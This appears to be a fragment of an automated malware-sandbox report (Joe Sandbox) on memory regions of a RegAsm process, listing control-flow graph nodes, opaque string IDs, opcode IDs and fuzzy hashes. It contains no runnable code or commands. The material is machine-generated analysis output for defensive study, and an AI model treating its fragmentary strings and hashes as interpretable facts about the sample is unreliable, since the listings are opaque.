17600->17599 17601 2a4c764 LdrInitializeThunk 17600->17601 17603 2a4c168 LdrInitializeThunk 17600->17603 17601->17599 17603->17600
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (ojq$(ojq$(ojq$(ojq$(ojq$(ojq$(ojq$,nq$,nq
                                                                                        • API String ID: 0-2862514371
                                                                                        • Opcode ID: dd40a4e4a131dde919c7c0ff3cd1125422c17ad1bf930eba32a9c8fff333c921
                                                                                        • Instruction ID: f8a5df7cbf8f8cdc44516fcf00dfce5e1e508245ed386daa3914033e90b601f5
                                                                                        • Opcode Fuzzy Hash: dd40a4e4a131dde919c7c0ff3cd1125422c17ad1bf930eba32a9c8fff333c921
                                                                                        • Instruction Fuzzy Hash: 97823A31A006099FCB14CF69E984EAEFBF6FF88314F158559E8469B2A1D734ED41CB60
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (ojq$(ojq$(ojq$,nq$,nq$Hnq
                                                                                        • API String ID: 0-2901307771
                                                                                        • Opcode ID: c57d1ee06d5681acd70e90876d971c0142b2eb449fa92805daae9272a1936ca4
                                                                                        • Instruction ID: ca8da55a0afc2385850998f8da2f5bf9f91fce6c5070fbb16b3ccf3186243708
                                                                                        • Opcode Fuzzy Hash: c57d1ee06d5681acd70e90876d971c0142b2eb449fa92805daae9272a1936ca4
                                                                                        • Instruction Fuzzy Hash: 9B826D70A002199FCB55DF69D894BAEBBF6FF88300F148569E8059B3A5DB35DC41CBA0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2363 50d1c58-50d1c80 2364 50d1c87-50d1d2b 2363->2364 2365 50d1c82 2363->2365 2369 50d1d2d-50d1d34 2364->2369 2370 50d1d39-50d1d8a 2364->2370 2365->2364 2371 50d1f94-50d1fb2 2369->2371 2378 50d1e5c 2370->2378 2379 50d1e65-50d1e73 2378->2379 2380 50d1d8f-50d1dbc 2379->2380 2381 50d1e79-50d1e9e 2379->2381 2388 50d1ddd 2380->2388 2389 50d1dbe-50d1dc7 2380->2389 2385 50d1eb6 2381->2385 2386 50d1ea0-50d1eb5 2381->2386 2385->2371 2386->2385 2390 50d1de0-50d1e01 2388->2390 2392 50d1dce-50d1dd1 2389->2392 2393 50d1dc9-50d1dcc 2389->2393 2397 50d1e5a-50d1e5b 2390->2397 2398 50d1e03-50d1e59 2390->2398 2394 50d1ddb 2392->2394 2393->2394 2394->2390 2397->2378 2398->2397
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PHjq$PHjq
                                                                                        • API String ID: 0-3092175318
                                                                                        • Opcode ID: 76dfd3ae6d0007dd1f7fcd3c46ef2680bce2f2309e2a48244eed5ab0305a381e
                                                                                        • Instruction ID: a897ecd97504d7d15b36479fcffe90edf16d5bded62ede1f13632fd7db6abb6b
                                                                                        • Opcode Fuzzy Hash: 76dfd3ae6d0007dd1f7fcd3c46ef2680bce2f2309e2a48244eed5ab0305a381e
                                                                                        • Instruction Fuzzy Hash: D8819E74E003188FDB58DFAAD9947ADFBF2BF89300F20816AD419AB294DB745945CF50

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2504 2a4c168-2a4c178 2505 2a4c17f-2a4c18b 2504->2505 2506 2a4c17a 2504->2506 2509 2a4c192-2a4c1a7 2505->2509 2510 2a4c18d 2505->2510 2507 2a4c2ab-2a4c2b5 2506->2507 2513 2a4c1ad-2a4c1b8 2509->2513 2514 2a4c2bb-2a4c2fb call 2a45d08 2509->2514 2510->2507 2517 2a4c2b6 2513->2517 2518 2a4c1be-2a4c1c5 2513->2518 2531 2a4c302-2a4c378 call 2a45d08 call 2a45c00 2514->2531 2517->2514 2519 2a4c1c7-2a4c1de 2518->2519 2520 2a4c1f2-2a4c1fd 2518->2520 2530 2a4c1e4-2a4c1e7 2519->2530 2519->2531 2525 2a4c1ff-2a4c207 2520->2525 2526 2a4c20a-2a4c214 2520->2526 2525->2526 2534 2a4c29e-2a4c2a3 2526->2534 2535 2a4c21a-2a4c224 2526->2535 2530->2517 2536 2a4c1ed-2a4c1f0 2530->2536 2564 2a4c3df-2a4c454 call 2a45ca8 2531->2564 2565 2a4c37a-2a4c3b7 2531->2565 2534->2507 2535->2517 2542 2a4c22a-2a4c246 2535->2542 2536->2519 2536->2520 2547 2a4c248 2542->2547 2548 2a4c24a-2a4c24d 2542->2548 2547->2507 2550 2a4c254-2a4c257 2548->2550 2551 2a4c24f-2a4c252 2548->2551 2553 2a4c25a-2a4c268 2550->2553 2551->2553 2553->2517 2557 2a4c26a-2a4c271 2553->2557 2557->2507 2559 2a4c273-2a4c279 2557->2559 2559->2517 2560 2a4c27b-2a4c280 2559->2560 2560->2517 2562 2a4c282-2a4c295 2560->2562 2562->2517 2570 2a4c297-2a4c29a 2562->2570 2573 2a4c4f3-2a4c4f9 2564->2573 2567 2a4c3be-2a4c3dc 2565->2567 2568 2a4c3b9 2565->2568 2567->2564 2568->2567 2570->2559 2572 2a4c29c 2570->2572 2572->2507 2574 2a4c4ff-2a4c517 2573->2574 2575 2a4c459-2a4c46c 2573->2575 2576 2a4c519-2a4c526 2574->2576 2577 2a4c52b-2a4c53e 2574->2577 2578 2a4c473-2a4c4c4 2575->2578 2579 2a4c46e 2575->2579 2580 2a4c8c1-2a4c9bf 2576->2580 2581 2a4c545-2a4c561 2577->2581 2582 2a4c540 2577->2582 2596 2a4c4c6-2a4c4d4 2578->2596 2597 2a4c4d7-2a4c4e9 2578->2597 2579->2578 2587 2a4c9c7-2a4c9d1 2580->2587 2588 2a4c9c1-2a4c9c6 call 2a45ca8 2580->2588 2584 2a4c563 2581->2584 2585 2a4c568-2a4c58c 2581->2585 2582->2581 2584->2585 2592 2a4c593-2a4c5c5 2585->2592 2593 2a4c58e 2585->2593 2588->2587 2602 2a4c5c7 2592->2602 2603 2a4c5cc-2a4c60e 2592->2603 2593->2592 2596->2574 2599 2a4c4f0 2597->2599 2600 2a4c4eb 2597->2600 2599->2573 2600->2599 2602->2603 2605 2a4c615-2a4c61e 2603->2605 2606 2a4c610 2603->2606 2607 2a4c846-2a4c84c 2605->2607 2606->2605 2608 2a4c852-2a4c865 2607->2608 2609 2a4c623-2a4c648 2607->2609 2612 2a4c867 2608->2612 2613 2a4c86c-2a4c887 2608->2613 2610 2a4c64f-2a4c686 2609->2610 2611 2a4c64a 2609->2611 2621 2a4c68d-2a4c6bf 2610->2621 2622 2a4c688 2610->2622 2611->2610 2612->2613 2614 2a4c88e-2a4c8a2 2613->2614 2615 2a4c889 2613->2615 2619 2a4c8a4 2614->2619 2620 2a4c8a9-2a4c8bf LdrInitializeThunk 2614->2620 2615->2614 2619->2620 2620->2580 2624 2a4c6c1-2a4c6e6 2621->2624 2625 2a4c723-2a4c736 2621->2625 2622->2621 2628 2a4c6ed-2a4c71b 2624->2628 2629 2a4c6e8 2624->2629 2626 2a4c73d-2a4c762 2625->2626 2627 2a4c738 2625->2627 2632 2a4c764-2a4c765 2626->2632 2633 2a4c771-2a4c7a9 2626->2633 2627->2626 2628->2625 2629->2628 2632->2608 2634 2a4c7b0-2a4c811 call 2a4c168 2633->2634 2635 2a4c7ab 2633->2635 2641 2a4c813 2634->2641 2642 2a4c818-2a4c83c 2634->2642 2635->2634 2641->2642 2645 2a4c843 2642->2645 2646 2a4c83e 2642->2646 2645->2607 2646->2645
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4533750277.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2a40000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4820c743d9e195b7674e45d2258aa55e7f4b65b477b6511a51f28393910182cd
                                                                                        • Instruction ID: 923c958431cd470d24a297bbec420cf6a4ef78d799b460ff44bbb227b30e6028
                                                                                        • Opcode Fuzzy Hash: 4820c743d9e195b7674e45d2258aa55e7f4b65b477b6511a51f28393910182cd
                                                                                        • Instruction Fuzzy Hash: 3F223670E012198FCB14DFA8C984B9DBBB2BF88314F5085AAD809AB355DF75D986CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0d2df64d2ff3fa454a37fbaf2eb83667c0634a2c796805cd2a3f990f3c7a4d20
                                                                                        • Instruction ID: b66359f70d78cd22bb17952f159a470bc42b250fa144c081b39fb590d9ea7d26
                                                                                        • Opcode Fuzzy Hash: 0d2df64d2ff3fa454a37fbaf2eb83667c0634a2c796805cd2a3f990f3c7a4d20
                                                                                        • Instruction Fuzzy Hash: C9826B74E012298FDB64DF69DD94B9DBBB2BF88300F1481EA984DA7265DB305E81CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: abf5343ef7da1752c4817ef4a222c72b96d9fb91f66b30655a021cd7571aa28c
                                                                                        • Instruction ID: 0c0c2fa3b3b4a8d6e7f97bb71631181eb989763c4ae944b809bfa7a382fbafdc
                                                                                        • Opcode Fuzzy Hash: abf5343ef7da1752c4817ef4a222c72b96d9fb91f66b30655a021cd7571aa28c
                                                                                        • Instruction Fuzzy Hash: 3CE1D2B4E01218CFDB64DFA5D944B9DBBB2FF88300F2081A9D809A7395DB359A85CF10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f53273bd3172dac4911b6021ad1c67c641baf60c0896a7b5d06de108e2de05ae
                                                                                        • Instruction ID: 52e52452da728a712295f1fd6af777ba4a37165df6ba669d72067c57511b93aa
                                                                                        • Opcode Fuzzy Hash: f53273bd3172dac4911b6021ad1c67c641baf60c0896a7b5d06de108e2de05ae
                                                                                        • Instruction Fuzzy Hash: 5941CFB0D006088BEB18DFAAD9547DEFBF2BF89300F54C16AC418AB264DB755946CF24

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1814 50d8848-50d8d36 1889 50d8d3c-50d8d4c 1814->1889 1890 50d9288-50d92a8 1814->1890 1889->1890 1891 50d8d52-50d8d62 1889->1891 1894 50d92f9-50d9301 1890->1894 1895 50d92aa-50d92bd 1890->1895 1891->1890 1893 50d8d68-50d8d78 1891->1893 1893->1890 1896 50d8d7e-50d8d8e 1893->1896 1904 50d9326-50d9329 1894->1904 1905 50d9303-50d930e 1894->1905 1897 50d92bf-50d92c4 1895->1897 1898 50d92c9-50d92e7 1895->1898 1896->1890 1899 50d8d94-50d8da4 1896->1899 1902 50d93ae-50d93b3 1897->1902 1923 50d935e-50d936a 1898->1923 1924 50d92e9-50d92f3 1898->1924 1899->1890 1900 50d8daa-50d8dba 1899->1900 1900->1890 1903 50d8dc0-50d8dd0 1900->1903 1903->1890 1909 50d8dd6-50d8de6 1903->1909 1907 50d932b-50d9337 1904->1907 1908 50d9340-50d934c 1904->1908 1905->1904 1918 50d9310-50d931a 1905->1918 1907->1908 1920 50d9339-50d933e 1907->1920 1911 50d934e-50d9355 1908->1911 1912 50d93b4-50d9410 1908->1912 1909->1890 1910 50d8dec-50d8dfc 1909->1910 1910->1890 1916 50d8e02-50d8e12 1910->1916 1911->1912 1917 50d9357-50d935c 1911->1917 1936 50d9423-50d942e 1912->1936 1937 50d9412-50d941d 1912->1937 1916->1890 1921 50d8e18-50d9287 1916->1921 1917->1902 1918->1904 1928 50d931c-50d9321 1918->1928 1920->1902 1933 50d936c-50d9378 1923->1933 1934 50d9381-50d938d 1923->1934 1924->1923 1931 50d92f5-50d92f7 1924->1931 1928->1902 1931->1894 1933->1934 1945 50d937a-50d937f 1933->1945 1941 50d938f-50d939b 1934->1941 1942 50d93a4-50d93a6 1934->1942 1947 50d94ff-50d952b 1936->1947 1948 50d9434-50d9491 1936->1948 1937->1936 1946 50d94a6-50d94f8 1937->1946 1941->1942 1951 50d939d-50d93a2 1941->1951 1942->1902 1945->1902 1946->1947 1960 50d949a-50d94a3 1948->1960 1951->1902
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $jq$$jq
                                                                                        • API String ID: 0-3720491408
                                                                                        • Opcode ID: 56d99300b6a2a56e96b95556d8420891b8f880303be50ae02bd619788e734d86
                                                                                        • Instruction ID: 07886d0efe74bed04baf1c84df107f01ecb96f34385a69c8143010a3d51857a4
                                                                                        • Opcode Fuzzy Hash: 56d99300b6a2a56e96b95556d8420891b8f880303be50ae02bd619788e734d86
                                                                                        • Instruction Fuzzy Hash: FB624D70A002188FEB659BA4D960BEEBBB7FF84300F1084A9C50A6B3A5DF359D45DF51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2107 50d65f1-50d660d 2108 50d660f-50d6613 2107->2108 2109 50d6615-50d6617 2107->2109 2108->2109 2110 50d661c-50d6627 2108->2110 2111 50d6828-50d682f 2109->2111 2112 50d662d-50d6634 2110->2112 2113 50d6830 2110->2113 2114 50d67c9-50d67cf 2112->2114 2115 50d663a-50d6649 2112->2115 2116 50d6835-50d686d 2113->2116 2118 50d67d5-50d67d9 2114->2118 2119 50d67d1-50d67d3 2114->2119 2115->2116 2117 50d664f-50d665e 2115->2117 2145 50d686f-50d6874 2116->2145 2146 50d6876-50d687a 2116->2146 2125 50d6660-50d6663 2117->2125 2126 50d6673-50d6676 2117->2126 2120 50d67db-50d67e1 2118->2120 2121 50d6826 2118->2121 2119->2111 2120->2113 2122 50d67e3-50d67e6 2120->2122 2121->2111 2122->2113 2127 50d67e8-50d67fd 2122->2127 2129 50d6665-50d6668 2125->2129 2130 50d6682-50d6688 2125->2130 2126->2130 2131 50d6678-50d667b 2126->2131 2143 50d67ff-50d6805 2127->2143 2144 50d6821-50d6824 2127->2144 2132 50d666e 2129->2132 2133 50d6769-50d676f 2129->2133 2138 50d668a-50d6690 2130->2138 2139 50d66a0-50d66bd 2130->2139 2134 50d667d 2131->2134 2135 50d66ce-50d66d4 2131->2135 2140 50d6794-50d67a1 2132->2140 2149 50d6787-50d6791 2133->2149 2150 50d6771-50d6777 2133->2150 2134->2140 2141 50d66ec-50d66fe 2135->2141 2142 50d66d6-50d66dc 2135->2142 2147 50d6694-50d669e 2138->2147 2148 50d6692 2138->2148 2178 50d66c6-50d66c9 2139->2178 2169 50d67b5-50d67b7 2140->2169 2170 50d67a3-50d67a7 2140->2170 2172 50d670e-50d6731 2141->2172 2173 50d6700-50d670c 2141->2173 2151 50d66de 2142->2151 2152 50d66e0-50d66ea 2142->2152 2153 50d6817-50d681a 2143->2153 2154 50d6807-50d6815 2143->2154 2144->2111 2155 50d6880-50d6882 2145->2155 2146->2155 2147->2139 2148->2139 2149->2140 2156 50d6779 2150->2156 2157 50d677b-50d6785 2150->2157 2151->2141 2152->2141 2153->2113 2164 50d681c-50d681f 2153->2164 2154->2113 2154->2153 2161 50d6884-50d6896 2155->2161 2162 50d6897-50d689e 2155->2162 2156->2149 2157->2149 2164->2143 2164->2144 2176 50d67bb-50d67be 2169->2176 2170->2169 2174 50d67a9-50d67ad 2170->2174 2172->2113 2184 50d6737-50d673a 2172->2184 2182 50d6759-50d6767 2173->2182 2174->2113 2179 50d67b3 2174->2179 2176->2113 2180 50d67c0-50d67c3 2176->2180 2178->2140 2179->2176 2180->2114 2180->2115 2182->2140 2184->2113 2186 50d6740-50d6752 2184->2186 2186->2182
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,nq$,nq
                                                                                        • API String ID: 0-3932345633
                                                                                        • Opcode ID: 5c75f0f9ca116eb60906d43078ca15252d730afff63de9f213ada5978fb52804
                                                                                        • Instruction ID: f6a21cc6775b9815ca99d505c05d0c3aae5efeac409063817a264d77d78b2611
                                                                                        • Opcode Fuzzy Hash: 5c75f0f9ca116eb60906d43078ca15252d730afff63de9f213ada5978fb52804
                                                                                        • Instruction Fuzzy Hash: 15818134A042058FCB54CF69E994A6EF7F2FF89314B158169D406E73A5DB32E841CFA0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2188 50d2508-50d2527 2189 50d252d-50d2536 2188->2189 2190 50d26e2-50d2707 2188->2190 2193 50d253c-50d2591 2189->2193 2194 50d270e-50d27a8 call 50d2270 2189->2194 2190->2194 2203 50d25bb-50d25c4 2193->2203 2204 50d2593-50d25b8 2193->2204 2234 50d27ad-50d27b2 2194->2234 2206 50d25c9-50d25d9 2203->2206 2207 50d25c6 2203->2207 2204->2203 2244 50d25db call 50d26e9 2206->2244 2245 50d25db call 50d2508 2206->2245 2246 50d25db call 50d24f8 2206->2246 2207->2206 2210 50d25e1-50d25e3 2212 50d263d-50d268a 2210->2212 2213 50d25e5-50d25ea 2210->2213 2226 50d2691-50d2696 2212->2226 2215 50d25ec-50d2621 2213->2215 2216 50d2623-50d2636 2213->2216 2215->2226 2216->2212 2227 50d2698 2226->2227 2228 50d26a0-50d26a5 2226->2228 2227->2228 2230 50d26af-50d26b4 2228->2230 2231 50d26a7 2228->2231 2235 50d26c9 2230->2235 2236 50d26b6-50d26c4 call 50d20e4 call 50d20fc 2230->2236 2231->2230 2235->2190 2236->2235 2244->2210 2245->2210 2246->2210
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (&jq$(nq
                                                                                        • API String ID: 0-2454636555
                                                                                        • Opcode ID: da51daa0ca99b87b2bc45fb4d220d7a77bbc55d44eaa6d9bc4b0bb63d5ecd187
                                                                                        • Instruction ID: b8fb55a236c76edf0e7bbbe381bdad28c59257edfc458a2aa5fbbe2210c89826
                                                                                        • Opcode Fuzzy Hash: da51daa0ca99b87b2bc45fb4d220d7a77bbc55d44eaa6d9bc4b0bb63d5ecd187
                                                                                        • Instruction Fuzzy Hash: DA716131F043199BCB15DBB8D8646EEBBF2AF89700F148529E406AB294DE309D46C7A1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2247 50d6130-50d6162 2248 50d6178-50d6183 2247->2248 2249 50d6164-50d6168 2247->2249 2252 50d6189-50d618b 2248->2252 2253 50d622b-50d6257 2248->2253 2250 50d616a-50d6176 2249->2250 2251 50d6190-50d6197 2249->2251 2250->2248 2250->2251 2255 50d6199-50d61a0 2251->2255 2256 50d61b7-50d61c0 2251->2256 2254 50d6223-50d6228 2252->2254 2259 50d625e-50d62b6 2253->2259 2255->2256 2257 50d61a2-50d61ad 2255->2257 2360 50d61c2 call 50d62a8 2256->2360 2361 50d61c2 call 50d6130 2256->2361 2257->2259 2260 50d61b3-50d61b5 2257->2260 2281 50d62b8-50d62be 2259->2281 2282 50d62c5-50d62d6 call 50d2a50 2259->2282 2260->2254 2261 50d61c8-50d61ca 2262 50d61cc-50d61d0 2261->2262 2263 50d61d2-50d61da 2261->2263 2262->2263 2266 50d61ed-50d61fe 2262->2266 2267 50d61dc-50d61e1 2263->2267 2268 50d61e9-50d61eb 2263->2268 2352 50d6201 call 50d6988 2266->2352 2353 50d6201 call 50d6998 2266->2353 2354 50d6201 call 50d6a11 2266->2354 2267->2268 2268->2254 2271 50d6207-50d620c 2273 50d620e-50d6217 2271->2273 2274 50d6221 2271->2274 2355 50d6219 call 50d947d 2273->2355 2356 50d6219 call 50d8838 2273->2356 2357 50d6219 call 50d8848 2273->2357 2274->2254 2276 50d621f 2276->2254 2281->2282 2285 50d62dc-50d62e0 2282->2285 2286 50d636a-50d636c 2282->2286 2287 50d62f0-50d62fd 2285->2287 2288 50d62e2-50d62ee 2285->2288 2358 50d636e call 50d62a8 2286->2358 2359 50d636e call 50d6130 2286->2359 2294 50d62ff-50d6309 2287->2294 2288->2294 2289 50d6374-50d637a 2292 50d637c-50d6382 2289->2292 2293 50d6386-50d638d 2289->2293 2295 50d63e8-50d6447 2292->2295 2296 50d6384 2292->2296 2299 50d630b-50d631a 2294->2299 2300 50d6336-50d633a 2294->2300 2308 50d644e-50d647e 2295->2308 2296->2293 2311 50d631c-50d6323 2299->2311 2312 50d632a-50d6334 2299->2312 2301 50d633c-50d6342 2300->2301 2302 50d6346-50d634a 2300->2302 2304 50d6344 2301->2304 2305 50d6390-50d63e1 2301->2305 2302->2293 2306 50d634c-50d6350 2302->2306 2304->2293 2305->2295 2306->2308 2309 50d6356-50d6368 2306->2309 2323 50d6480-50d648d 2308->2323 2324 50d64a3-50d64b0 2308->2324 2309->2293 2311->2312 2312->2300 2330 50d649f-50d64a1 2323->2330 2331 50d648f-50d649d 2323->2331 2329 50d64b2-50d64bc 2324->2329 2337 50d64be-50d64cc 2329->2337 2338 50d64e4-50d64e6 call 50d65f1 2329->2338 2330->2329 2331->2329 2343 50d64ce-50d64d2 2337->2343 2344 50d64d9-50d64e2 2337->2344 2341 50d64ec-50d64f0 2338->2341 2345 50d6509-50d650d 2341->2345 2346 50d64f2-50d6507 2341->2346 2343->2344 2344->2338 2347 50d650f-50d6524 2345->2347 2348 50d652b-50d6531 2345->2348 2346->2348 2347->2348 2352->2271 2353->2271 2354->2271 2355->2276 2356->2276 2357->2276 2358->2289 2359->2289 2360->2261 2361->2261
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Hnq$Hnq
                                                                                        • API String ID: 0-3075287205
                                                                                        • Opcode ID: f97c514e452b3723b42ada1e243d778348b1ac42f5f33344c5ee19df31cc9941
                                                                                        • Instruction ID: 838ce2d40c13aad2df44f1f731c9bdad9857196050c8a18818e14bb410d37acd
                                                                                        • Opcode Fuzzy Hash: f97c514e452b3723b42ada1e243d778348b1ac42f5f33344c5ee19df31cc9941
                                                                                        • Instruction Fuzzy Hash: 6251AE357043559FDB258F64E854BBEBFE2FF89300F094569E8468B291DB36D802CBA0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2647 2a4c76c 2648 2a4c82b-2a4c83c 2647->2648 2649 2a4c843-2a4c84c 2648->2649 2650 2a4c83e 2648->2650 2652 2a4c852-2a4c865 2649->2652 2653 2a4c623-2a4c648 2649->2653 2650->2649 2656 2a4c867 2652->2656 2657 2a4c86c-2a4c887 2652->2657 2654 2a4c64f-2a4c686 2653->2654 2655 2a4c64a 2653->2655 2665 2a4c68d-2a4c6bf 2654->2665 2666 2a4c688 2654->2666 2655->2654 2656->2657 2658 2a4c88e-2a4c8a2 2657->2658 2659 2a4c889 2657->2659 2663 2a4c8a4 2658->2663 2664 2a4c8a9-2a4c8bf LdrInitializeThunk 2658->2664 2659->2658 2663->2664 2667 2a4c8c1-2a4c9bf 2664->2667 2673 2a4c6c1-2a4c6e6 2665->2673 2674 2a4c723-2a4c736 2665->2674 2666->2665 2669 2a4c9c7-2a4c9d1 2667->2669 2670 2a4c9c1-2a4c9c6 call 2a45ca8 2667->2670 2670->2669 2678 2a4c6ed-2a4c71b 2673->2678 2679 2a4c6e8 2673->2679 2676 2a4c73d-2a4c762 2674->2676 2677 2a4c738 2674->2677 2682 2a4c764-2a4c765 2676->2682 2683 2a4c771-2a4c7a9 2676->2683 2677->2676 2678->2674 2679->2678 2682->2652 2684 2a4c7b0-2a4c811 call 2a4c168 2683->2684 2685 2a4c7ab 2683->2685 2691 2a4c813 2684->2691 2692 2a4c818-2a4c82a 2684->2692 2685->2684 2691->2692 2692->2648
                                                                                        APIs
                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 02A4C8AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4533750277.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2a40000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: dc9923086c58b1473c644988e2ad21e3434b39de51796fbb2db8e01f1e10bfed
                                                                                        • Instruction ID: 5774557ea4e383619c42cc77e16beea85dab408bec10a1a6ad773df0c59e18a8
                                                                                        • Opcode Fuzzy Hash: dc9923086c58b1473c644988e2ad21e3434b39de51796fbb2db8e01f1e10bfed
                                                                                        • Instruction Fuzzy Hash: 67113D75E021099FDB04DBA8D484AADBBB6FFC8315F549166E808A7246DF70D941CB60
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d8oq
                                                                                        • API String ID: 0-2048867746
                                                                                        • Opcode ID: da58f3b3dd6b048ed6c1ea72e2ff8171192d697340ddb45fb42b14aa8ecb63a0
                                                                                        • Instruction ID: 72338183a323841a708b13d79c86935d2ae43c2dd6f259f6706c554395157998
                                                                                        • Opcode Fuzzy Hash: da58f3b3dd6b048ed6c1ea72e2ff8171192d697340ddb45fb42b14aa8ecb63a0
                                                                                        • Instruction Fuzzy Hash: 5E418E343407018FC768AB39E858B6EBBE6BF89300F044569E546CB7A5DF65EC05CB54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq
                                                                                        • API String ID: 0-3676250632
                                                                                        • Opcode ID: c32248db02255a109ea87f6575b623a868646ab77d4b2425d57f5db3be828626
                                                                                        • Instruction ID: d77a843d0a7b72ea78ec545e84c984308c8eac5542c4097c0dd947041e0e99ef
                                                                                        • Opcode Fuzzy Hash: c32248db02255a109ea87f6575b623a868646ab77d4b2425d57f5db3be828626
                                                                                        • Instruction Fuzzy Hash: 414127756002159FCB14DF28E988AAEBBF6FF49310F104069F906CB2A1CB75DD51CBA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq
